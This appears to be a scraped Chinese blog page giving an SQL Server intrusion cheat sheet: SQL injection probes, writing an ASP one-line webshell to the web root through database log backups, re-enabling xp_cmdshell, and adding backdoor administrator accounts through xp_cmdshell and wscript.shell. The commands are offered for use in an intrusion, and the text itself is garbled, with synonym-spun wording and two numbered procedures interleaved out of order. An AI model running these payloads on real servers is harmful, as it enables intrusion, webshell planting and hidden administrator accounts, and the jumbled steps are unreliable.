手工达成差别备份的步调

在侵犯进程中,获得SQLserver的权杖,想进一层得到system权限的诀窍计算

字符型:

*************************** 利用xp_cmdshell
***********************************

1、恢复生机当前库;alter database 当前库 set recovery full–

一.更正sa口令方法:
用sql综合运用工具连接后,试行命令:
exec sp_password NULL,’新密码’,’sa’
(提示:慎用!)

2、建表cmd;create table cmd (a image)–

二.轻易修补sa弱口令.

3、备份当前库到d:cmd1;backup log 当前库 to disk = ‘d:cmd1’ with init–

艺术1:查询分离器连接后施行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

4、插入一句话代码到创制的表cmd;insert into cmd (a卡塔尔 values
(‘%%25**ecute(request(a))%%25’)–

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

5、备份一句话代码到站点根目录;backup log 当前库 to disk =
‘d:www_weboct.asp教程’–

然后按F5键命令实行实现

6、完结;drop table 创制的表–

办法2:查询分离器连接后
先是步奉行:use master
其次步实行:sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令施行完成

数字型

三.恢复xp_cmdshell
总来讲之恢复生机xp_cmdshell
;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’–

1、复苏当前库’;alter database 当前库 set recovery full–

1.得不到找到存款和储蓄进程’master..xpcmdshell’.
还原措施:查询抽离器连接后,
首先步实行:EXEC sp_addextendedproc xp_cmdshell,@dllname
=’xplog70.dll’declare @o int
第二步实施:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
下一场按F5键命令施行实现

2、创建表cmd’;create table cmd (a image)–

2.不恐怕装载 DLL xpsql70.dll
或该DLL所征引的某一DLL。原因126(找不到内定模块卡塔尔国
复苏措施:查询分离器连接后,
第一步实施:sp_dropextendedproc “xp_cmdshell”
第二步履行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令实施完成

3、备份当前库到d:cmd1′;backup log 当前库 to disk = ‘d:cmd1’ with init–

3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到钦赐的次序State of Qatar
复原措施:查询分离器连接后,
率先步施行:exec sp_dropextendedproc ‘xp_cmdshell’
其次步试行:exec sp_addextendedproc ‘xp_cmdshell’,’xpweb70.dll’
下一场按F5键命令奉行完成

4、插入一句话代码到成立的表cmd’;insert into cmd (aState of Qatar values
(‘%%25**ecute(request(a))%%25’)–

四、利用xp_cmdshell
exec master..xp_cmdshell ‘ver’
exec master.dbo.xp_cmdshell ‘net user test test /add’
exec master.dbo.xp_cmdshell ‘net localgroup administrators test /add’

5、备份一句话代码到站点根目录’;backup log 当前库 to disk =
‘d:www_weboct.asp’–

五.SQL Server二〇〇五在暗中认可情状下,一些累积进程是关门着的,须要命令展开
开启xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 1;RECONFIGURE;
关闭xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 0;RECONFIGURE;

6、达成’;drop table 成立的表–

开启’OPENROWSET’:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec
sp_configure’Ad Hoc Distributed Queries’,1;RECONFIGURE;

sa权限创立管理员顾客

开启’sp_oacreate’:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec
sp_configure’Ole Automation Procedures’,1;RECONFIGURE;

1、决断是不是有注入;and 1=1 ;and 1=2 ;and user_name(卡塔尔(قطر‎=’dbo’
推断当前系统的接连用户是还是不是sa

*******************************
利用wscript.shell
*****************************************

2、加多类其他处理人;exec master.dbo.xp_cmdshell ‘net user wk
wk90/add’;– ;exec master.dbo.xp_cmdshell ‘net localgroup
administrators wk /add’;–

行使wscript.shell直接加多系统帐户:
查询分离器连接后,xp或二〇〇二server系统下利用:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net
user 新用户 密码 /add’

相关文章